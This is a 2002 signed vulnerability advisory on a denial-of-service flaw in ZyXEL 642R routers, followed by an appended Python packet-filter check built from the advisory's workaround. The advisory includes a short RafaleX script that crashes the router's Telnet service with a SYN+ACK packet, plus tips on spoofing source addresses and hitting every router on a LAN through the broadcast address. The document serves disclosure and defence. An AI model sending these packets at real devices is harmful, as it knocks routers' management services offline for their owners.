-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Name: ZyXEL 642R(-11) AJ.6; other routers based on ZyNOS are also susceptible to this DoS
Systems Affected: ZyNOS
Severity: Medium Risk
Category: Denial of Service
Vendor URL: www.zyxel.com
Vendor contacted: 1.6.2002
Vendor fix: -

Summary
-------
The ZyXEL Prestige 642R-11 AJ.6 has a problem handling specially crafted packets. It is possible to send a packet that makes the router's services (Telnet & FTP; DHCP service not tested) unavailable. Network traffic is not stopped. Possibly more ZyNOS based routers are vulnerable. Please reply if you find any other ZyNOS based router vulnerable.

Details
-------
A ZyXEL 642R-11 router service can be crashed by sending a packet with the TCP flags ACK and SYN set at the same time. The service will then not be available even through RS-232. Using a SYN-FIN packet makes the service port inaccessible for a few minutes.

Affected services on the ZyXEL 642R-11 are: TELNET, FTP and DHCP (if enabled). TELNET and FTP cannot be deactivated.

Bypassing packet filter rules:
The source IP can also be spoofed. This allows "bypassing" a filter that blocks specific IPs. As target address you can also use the WAN address from the LAN (see BID 3346: http://online.securityfocus.com/bid/3346) if the router's packet filter blocks its local address as target.

The DoS attack also works using the broadcast address of the LAN. This means that all ZyXEL routers in the LAN that are vulnerable to this attack can be crashed by sending one single packet.

Exploit
-------
# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6))
!Sleep 1000
!Display=$done

Fix
---
Not yet available (17.6.2002). Vendor was contacted 1.6.2002.

Workaround
----------
- On the WAN device, block these packets:
  - all packets coming from the WAN to ports 21, 23 and 67 (source: 0.0.0.0 -> target: 0.0.0.0, applied on the input filter of the WAN device)
- On the LAN device, block these packets on ports 21, 23 and 67:
  - WAN IP of the router as target IP (Why? http://online.securityfocus.com/bid/3346)
  - LAN address of the router as target IP
  - Broadcast address as target IP ;)

Regards,
Ueli Kistler
eclipse@packx.net / iuk@gmx.ch
www.packx.net / www.eclipse.fr.fm
(IDScenter 1.09 beta 2 is out soon)

Greets to the PacKX Team (RafaleX packet builder for Win2K/XP)

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBPQ3dBmnfm6NyZfRJEQKxCACfZhLa34IfHY7NL5bSl9NK11nUI+EAoNLF
ZS3YZqNynsew/jYuvcnLhUVT
=hDk8
-----END PGP SIGNATURE-----
Key-ID: 0x7265F449
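The workaround above is a pair of filter rules, and the Details section names two flag combinations (SYN+ACK, SYN+FIN) that a router listening on ports 21, 23 and 67 should never receive. The following is an added example, not part of the advisory and not ZyNOS or RafaleX code: a small IPv4/TCP header parser plus a check that applies the advisory's two workaround rules and flags those two combinations, so it can be run over captured traffic on the filtering device. The router addresses (203.0.113.5, 192.168.1.1, 192.168.1.255) and all packets are constructed sample values; the example treats all three ports as TCP because that is how the advisory's filter rules describe them.

```python
import ipaddress
import struct

# Management ports named in the advisory's workaround (FTP, Telnet, DHCP).
MGMT_PORTS = {21, 23, 67}

TCP_FIN = 0x01
TCP_SYN = 0x02
TCP_ACK = 0x10


def build_ipv4_tcp(src, dst, sport, dport, flags):
    """Construct a minimal 40-byte IPv4+TCP header for offline testing.
    Constructed sample input only: checksums stay zero and nothing is sent."""
    ip_hdr = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 40, 0, 0, 64, 6, 0,          # v4, IHL 5, total len 40, TTL 64, proto TCP
        ipaddress.IPv4Address(src).packed,
        ipaddress.IPv4Address(dst).packed,
    )
    tcp_hdr = struct.pack(
        "!HHIIBBHHH",
        sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0,   # data offset 5, window 8192
    )
    return ip_hdr + tcp_hdr


def parse_ipv4_tcp(pkt):
    """Return (src, dst, sport, dport, flags) for an IPv4/TCP packet, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6 or len(pkt) < ihl + 20:    # not TCP, or truncated TCP header
        return None
    src = str(ipaddress.IPv4Address(pkt[12:16]))
    dst = str(ipaddress.IPv4Address(pkt[16:20]))
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    flags = pkt[ihl + 13]                      # TCP flags byte
    return src, dst, sport, dport, flags


def check_segment(pkt, iface, router_wan_ip, router_lan_ip, lan_broadcast):
    """Apply the advisory's workaround rules plus its two flag combinations.

    iface is "wan" or "lan" (the side the packet arrived on). Returns a list of
    reasons to drop or alert on the segment; an empty list means no rule matched."""
    parsed = parse_ipv4_tcp(pkt)
    if parsed is None:
        return []
    src, dst, sport, dport, flags = parsed
    if dport not in MGMT_PORTS:
        return []
    reasons = []
    if iface == "wan":
        # Workaround rule 1: nothing from the WAN may reach the management ports.
        reasons.append("wan-to-mgmt-port")
    else:
        # Workaround rule 2: on the LAN, drop segments aimed at any address the
        # router answers on (its WAN IP, its LAN IP, or the LAN broadcast).
        targets = {router_wan_ip: "lan-to-router-wan-ip",
                   router_lan_ip: "lan-to-router-lan-ip",
                   lan_broadcast: "lan-to-broadcast"}
        if dst in targets:
            reasons.append(targets[dst])
    # Flag combinations from the Details section. SYN+FIN is never valid, and a
    # SYN+ACK arriving at a port the router only listens on belongs to no handshake.
    if flags & TCP_SYN and flags & TCP_FIN:
        reasons.append("syn+fin")
    if flags & TCP_SYN and flags & TCP_ACK:
        reasons.append("syn+ack-to-listener")
    return reasons


if __name__ == "__main__":
    # Constructed addresses for illustration only.
    wan_ip, lan_ip, bcast = "203.0.113.5", "192.168.1.1", "192.168.1.255"
    samples = [
        ("wan", build_ipv4_tcp("198.51.100.7", wan_ip, 40000, 23, TCP_SYN | TCP_ACK)),
        ("lan", build_ipv4_tcp("192.168.1.50", bcast, 40001, 21, TCP_SYN | TCP_FIN)),
        ("lan", build_ipv4_tcp("192.168.1.50", "192.168.1.60", 40002, 23, TCP_SYN)),
    ]
    for iface, pkt in samples:
        print(iface, parse_ipv4_tcp(pkt)[3], check_segment(pkt, iface, wan_ip, lan_ip, bcast))
```

The flag checks are deliberately limited to the management ports: a SYN+ACK is normal on the client side of any connection the router itself initiates, but on ports where it only listens there is no outstanding SYN for such a reply to match, so the combination is safe to drop without affecting forwarded traffic. The LAN rule reproduces the advisory's trade-off exactly: blocking the router's own LAN address on port 23 also blocks legitimate Telnet management from the LAN, which the advisory accepts because Telnet cannot be disabled on this firmware.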